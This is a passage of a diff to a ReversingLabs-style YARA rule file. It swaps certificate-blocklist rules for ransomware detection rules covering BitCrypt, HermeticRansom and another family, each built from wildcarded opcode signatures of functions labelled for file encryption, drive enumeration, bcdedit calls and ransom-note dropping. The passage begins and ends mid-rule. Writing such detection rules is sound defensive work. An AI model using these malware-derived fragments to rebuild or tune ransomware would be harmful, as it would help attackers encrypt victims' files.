+            A1 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 8C B7 00 00 00 33 D2 8B 0C 95 ?? ?? ?? ?? 33 0C 95 ?? ?? ?? ?? 81 E1 ?? ?? ?? ?? 33 0C
+            95 ?? ?? ?? ?? 8B C1 D1 E9 83 E0 ?? 33 0C 85 ?? ?? ?? ?? 33 0C 95 ?? ?? ?? ?? 89 0C 95 ?? ?? ?? ?? 42 81 FA ?? ?? ?? ??
+            7C C0 81 FA ?? ?? ?? ?? 7D 39 56 8D 34 95 ?? ?? ?? ?? 8B 0E 33 4E ?? 81 E1 ?? ?? ?? ?? 33 0E 8B C1 D1 E9 83 E0 ?? 8B 04
+            85 ?? ?? ?? ?? 33 86 ?? ?? ?? ?? 33 C1 89 06 83 C6 ?? 81 FE ?? ?? ?? ?? 7C D0 5E 8B 0D ?? ?? ?? ?? 33 0D ?? ?? ?? ?? 81
+            E1 ?? ?? ?? ?? 33 0D ?? ?? ?? ?? 8B C1 D1 E9 83 E0 ?? 33 0C 85 ?? ?? ?? ?? 33 0D ?? ?? ?? ?? 33 C0 89 0D ?? ?? ?? ?? 8B
+            0C 85 ?? ?? ?? ?? 40 A3 ?? ?? ?? ?? 8B C1 C1 E8 ?? 33 C8 8B C1 25 ?? ?? ?? ?? C1 E0 ?? 33 C8 8B C1 25 ?? ?? ?? ?? C1 E0
+            ?? 33 C8 8B C1 C1 E8 ?? 33 C1 C3
+        }
+		$decrypt_2 = {
+            A1 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 8C C7 00 00 00 33 D2 EB 0C 8D A4 24 ?? ?? ?? ?? EB 03 8D 49 ?? 8B 0C 95 ?? ?? ?? ?? 33
+            0C 95 ?? ?? ?? ?? 42 81 E1 ?? ?? ?? ?? 33 0C 95 ?? ?? ?? ?? 8B C1 83 E0 ?? D1 E9 33 0C 85 ?? ?? ?? ?? 33 0C 95 ?? ?? ??
+            ?? 89 0C 95 ?? ?? ?? ?? 81 FA ?? ?? ?? ?? 7C C0 81 FA ?? ?? ?? ?? 7D 3B 56 8D 34 95 ?? ?? ?? ?? 8B 0E 33 4E ?? 83 C6 ??
+            81 E1 ?? ?? ?? ?? 33 4E ?? 8B C1 83 E0 ?? D1 E9 8B 04 85 ?? ?? ?? ?? 33 86 ?? ?? ?? ?? 33 C1 89 46 ?? 81 FE ?? ?? ?? ??
+            7C CE 5E 8B 0D ?? ?? ?? ?? 33 0D ?? ?? ?? ?? 81 E1 ?? ?? ?? ?? 33 0D ?? ?? ?? ?? 8B C1 83 E0 ?? D1 E9 33 0C 85 ?? ?? ??
+            ?? 33 0D ?? ?? ?? ?? 33 C0 89 0D ?? ?? ?? ?? 8B 0C 85 ?? ?? ?? ?? 40 A3 ?? ?? ?? ?? 8B C1 C1 E8 ?? 33 C8 8B C1 25 ?? ??
+            ?? ?? C1 E0 ?? 33 C8 8B C1 25 ?? ?? ?? ?? C1 E0 ?? 33 C8 8B C1 C1 E8 ?? 33 C1 C3
+        }
+		$decrypt_3 = {
+            A1 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 8C C7 00 00 00 33 D2 EB 0C 8D A4 24 ?? ?? ?? ?? EB 03 8D 49 ?? 8B 0C 95 ?? ?? ?? ?? 33
+            0C 95 ?? ?? ?? ?? 42 81 E1 ?? ?? ?? ?? 33 0C 95 ?? ?? ?? ?? 8B C1 83 E0 ?? D1 E9 33 0C 85 ?? ?? ?? ?? 33 0C 95 ?? ?? ??
+            ?? 89 0C 95 ?? ?? ?? ?? 81 FA ?? ?? ?? ?? 7C C0 81 FA ?? ?? ?? ?? 7D 3B 56 8D 34 95 ?? ?? ?? ?? 8B 0E 33 4E ?? 83 C6 ??
+            81 E1 ?? ?? ?? ?? 33 4E ?? 8B C1 83 E0 ?? D1 E9 8B 04 85 ?? ?? ?? ?? 33 86 ?? ?? ?? ?? 33 C1 89 46 ?? 81 FE ?? ?? ?? ??
+            7C CE 5E 8B 0D ?? ?? ?? ?? 33 0D ?? ?? ?? ?? 81 E1 ?? ?? ?? ?? 33 0D ?? ?? ?? ?? 8B C1 83 E0 ?? D1 E9 33 0C 85 ?? ?? ??
+            ?? 33 0D ?? ?? ?? ?? 33 C0 89 0D ?? ?? ?? ?? 8B 0C 85 ?? ?? ?? ?? 40 A3 ?? ?? ?? ?? 8B C1 C1 E8 ?? 33 C8 8B C1 25 ?? ??
+            ?? ?? C1 E0 ?? 33 C8 8B C1 25 ?? ?? ?? ?? C1 E0 ?? 33 C8 8B C1 C1 E8 ?? 33 C1 C3
+        }
+		$entrypoint_all = {
+            83 EC ?? E8 ?? ?? ?? ?? 50 FF 15
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "3 AM CHP" and pe.signatures [ i ] . serial == "6e:32:53:1a:e8:39:92:f0:57:31:20:a5:e7:8d:e2:71" and 1451606399 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( ( $file_loop_1 and $encrypt_data_1 and $decrypt_data_1 and $decrypt_strings_1 and $decrypt_1 ) or ( $file_loop_2 and $encrypt_data_2 and $decrypt_data_2 and $decrypt_strings_2 and $decrypt_2 ) or ( $file_loop_3 and $encrypt_data_3 and $decrypt_data_3 and $decrypt_3 ) ) and ( $entrypoint_all at pe.entry_point ) )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6967A89Bcf6Efef160Aaeebbff376C0A : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Bitcrypt : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects BitCrypt ransomware."
 		author = "ReversingLabs"
-		id = "d6714f50-600b-5437-8be6-097f7dd93dc7"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "f00a0fd8-31a9-5ee6-b560-09ccf6fe490b"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1870-L1886"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.BitCrypt.yara#L3-L112"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "deb7465e453aa5838f81e15e270abc958a65e1a6051a88a5910244edbe874451"
+		logic_hash = "66cfe16a182e7f20d6358be9569ada5e6c36c94d44781d8c741638e1b174d44e"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "BitCrypt"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$bc_bcdedit = {
+            55 8B EC 6A ?? 53 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B2 ?? A1 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B D8 BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C3
+            E8 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8D 45
+            ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ??
+            ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ??
+            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? C3
+        }
+		$bc_enum_drives_a_z = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 33 D2 89 95 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B F0 33 C0 55 68 ?? ?? ??
+            ?? 64 FF 30 64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 06 B3 ?? 8D 85 ?? ?? ?? ?? 8B D3 E8 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ??
+            8D 45 ?? B1 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B D3 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
+            85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 E8 ?? 75 1B 8D 85 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ??
+            ?? 8B 06 8B 08 FF 51 ?? 43 80 FB ?? 0F 85 65 FF FF FF 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ??
+            ?? ?? E8 ?? ?? ?? ?? C3
+        }
+		$bc_do_extensions_1 = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 DB 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D
+            ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 4D ?? 89 55 ?? 89 45 ?? 8B 7D ?? 8B 5D ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
+            ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 85 ??
+            ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 85 81 01 00 00 E8 ?? ?? ?? ?? BA ??
+            ?? ?? ?? 33 C0 E8 ?? ?? ?? ?? 8B F0 8B C3 8B 14 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB 28 A0 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ??
+            50 8B 03 33 C9 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B 13 B8 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            85 C0 75 C8 EB 28 A0 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8B 03 33 C9 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B
+            C3 E8 ?? ?? ?? ?? 8B 13 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 C8 FF 75 ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? DB 85 ?? ?? ?? ?? 83 C4 ?? DB 3C
+        }
+		$bc_do_extensions_2 = {
+            24 9B 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8B C7 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B 13 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 17 8D 85 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? B3 ?? EB 02 33 DB 33 C0 5A 59 59 64 89 10 EB 0C E9 ?? ?? ?? ?? 33 DB E8 ?? ??
+            ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB D0 8B C3 5F 5E 5B 8B E5 5D C2
+        }
+		$bc_do_files_1 = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 4D ?? 89 55 ?? 8B F0
+            8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B3 ?? 8B 06 E8 ?? ?? ?? ??
+            89 45 ?? 8B 16 8D 85 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8B F8 85 FF 0F 85 91 00 00 00 F6 85 ?? ?? ?? ?? ?? 75 73 56 8D B5 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 A5
+            5E 8B 85 ?? ?? ?? ?? 89 45 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 33 D2 E8 ?? ?? ?? ?? 83 C4 ?? DD 1C 24 9B 8D 45 ?? E8
+            ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 36 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ??
+            ?? ?? 8B 45 ?? 8B 40 ?? 8B 00 8B 08 FF 51 ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 85 FF 0F 84 6F FF FF FF 8D 85 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 84 DB 0F 84 B7 00 00 00 8B 16 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D
+        }
+		$bc_do_files_2 = {
+            8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 85 FF 75 7E F6 85 ?? ?? ?? ?? ?? 74 64 8B 85 ?? ?? ?? ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 74 52 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 40 FF 36 FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B
+            C6 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 50 8B C6 8B 55 ?? E8 57 FE FF FF 59 84 C0 75 04 33 DB EB 21 8B 55 ?? 42 8B C6
+            B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 85 FF 74 82 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0
+            5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3
+        }
+		$bc_main_1 = {
+            55 8B EC B9 ?? ?? ?? ?? 6A ?? 6A ?? 49 75 F9 53 56 57 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64
+            89 20 33 C0 A3 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ??
+            ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? BA ??
+            ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ??
+            ?? ?? ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 8D 45 ?? 8B 0D ?? ?? ?? ??
+            8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 84 C0 75 7A 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B
+        }
+		$bc_main_2 = {
+            15 ?? ?? ?? ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 8D 45 ?? 8B 0D ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ??
+            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? 33 C0 E8 ?? ?? ?? ?? 8B 45 ?? 50 8D 45 ?? 8B 0D ?? ?? ?? ?? 8B 15
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 58 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB 11 BA ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B D8 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 80 FB ?? 0F 85 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? B2 ?? A1 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 75 ED A1 ?? ?? ?? ?? 8B 10 FF 52 ?? 83 F8 ?? 0F
+            8E ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 10 FF 52 ?? 99 F7 3D ?? ?? ?? ?? A3 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 10 FF 52 ?? 99 F7 3D
+            ?? ?? ?? ?? 89 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 48 85 C0 7C ?? 40 89 45 ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ??
+        }
+		$bc_main2 = {
+            E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 45 ??
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D
+            ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Chang Yucheng" and pe.signatures [ i ] . serial == "69:67:a8:9b:cf:6e:fe:f1:60:aa:ee:bb:ff:37:6c:0a" and 1451174399 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $bc_main_1 at pe.entry_point ) and $bc_main_2 and $bc_main2 and $bc_bcdedit and $bc_enum_drives_a_z and $bc_do_extensions_1 and $bc_do_extensions_2 and $bc_do_files_1 and $bc_do_files_2
 }
-
-rule REVERSINGLABS_Cert_Blocklist_7473D95405D2B0B3A8F28785Ce6E74Ca : INFO FILE
+rule REVERSINGLABS_Win64_Ransomware_Hermeticransom : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects HermeticRansom ransomware."
 		author = "ReversingLabs"
-		id = "7f44b9d8-917b-5fc4-9651-cce89358e415"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "6aaf89f4-0cf8-5f0e-b89d-01ac7edd06c0"
+		date = "2022-05-13"
+		modified = "2022-05-13"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1888-L1904"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win64.Ransomware.HermeticRansom.yara#L1-L105"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "e15b990b13617017ca2d1f8caf03d8ff3785ca9b860bf11f81af5dadf17a9be5"
+		logic_hash = "123d569a9d9b9d855b3baafd6194f102d82a594fd7a2bba073843a8654a317cb"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "HermeticRansom"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$drop_ransom_note = {
+            65 48 8B 0C 25 ?? ?? ?? ?? 48 8B 89 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 3B 41 ??
+            0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC 24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 0F 10 04 24 0F 11 44 24 ?? 0F 10 44 24 ?? 0F 11 44 24 ?? 0F 10 44
+            24 ?? 0F 11 04 24 E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 8D BC 24 ?? ?? ??
+            ?? 48 8D 35 ?? ?? ?? ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? E8 ?? ?? ?? ?? 48 8B 6D ?? 48
+            89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 8B 0D ?? ?? ??
+            ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 8B 0D ??
+            ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 C7 04 24 ?? ?? ?? ?? 48
+            8D 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 44 24 ?? 48 8B 4C 24 ?? 48 89 8C 24 ?? ??
+            ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 14 24 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
+            8B 44 24 ?? 48 8B 4C 24 ?? 48 8D 94 24 ?? ?? ?? ?? 48 89 14 24 48 89 4C 24 ?? 48 89
+            44 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 C7 04 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 4C 24
+            ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
+            8B 44 24 ?? 48 8B 4C 24 ?? 48 89 0C 24 48 89 44 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 4C
+            24 ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 44 24 ?? C7 04 24 ?? ?? ?? ?? 48 8D 15 ?? ?? ??
+            ?? 48 89 54 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48
+        }
+		$encrypt_files_p1 = {
+            E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 89 8C 24 ??
+            ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? 48 8B 35 ?? ?? ?? ?? 48 89 14 24
+            48 89 74 24 ?? 48 89 5C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 89 54 24 ?? 48 C7 44 24 ?? ??
+            ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? 48 89 5C 24 ?? 48 89 54 24 ?? E8
+            ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 8B 54 24 ?? 48 8B 9C 24 ?? ?? ?? ?? 48
+            85 DB 0F 85 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 4C 24 ?? 48 89 94 24 ?? ?? ?? ?? 48 8D
+            05 ?? ?? ?? ?? 48 89 04 24 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 89 04 24 48 8B 44 24 ?? 48 89 C1 48 C1 F8 ?? 48
+            C1 E8 ?? 48 01 C8 48 C1 F8 ?? 48 89 84 24 ?? ?? ?? ?? 48 C1 E0 ?? 48 29 C1 48 89 4C
+            24 ?? 48 89 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 89 04 24 0F 57 C0 0F
+            11 44 24 ?? E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 83 F8 ?? 7E ?? B8 ?? ?? ?? ??
+            48 89 84 24 ?? ?? ?? ?? 31 C9 EB ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ??
+            48 39 C1 0F 8D ?? ?? ?? ?? 48 89 CA 48 C1 E1 ?? 48 FF C2 48 89 D3 48 C1 E2 ?? 48 39
+            D1 0F 87 ?? ?? ?? ?? 48 8B 74 24 ?? 48 39 F2 0F 87 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ??
+            ?? 48 8B 05 ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? 48 8B 3D ?? ?? ?? ?? 48 89 3C 24 48 89
+        }
+		$encrypt_files_p2 = {
+            5C 24 ?? 48 89 44 24 ?? 48 29 CE 48 89 F3 48 F7 DE 48 C1 FE ?? 48 21 CE 48 8B BC 24
+            ?? ?? ?? ?? 48 01 FE 48 89 74 24 ?? 48 29 CA 48 89 54 24 ?? 48 89 5C 24 ?? E8 ?? ??
+            ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 8B 54 24 ?? 48 8B 5C 24 ?? 48 85 DB 0F 85 ??
+            ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 89 1C 24 48 89 44 24 ?? 48 89 4C 24 ?? 48 89 54
+            24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 83 F8 ?? 0F 8D ?? ?? ?? ?? 48 C1 E0 ?? 48 8B
+            4C 24 ?? 48 39 C8 0F 87 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? 48 8B
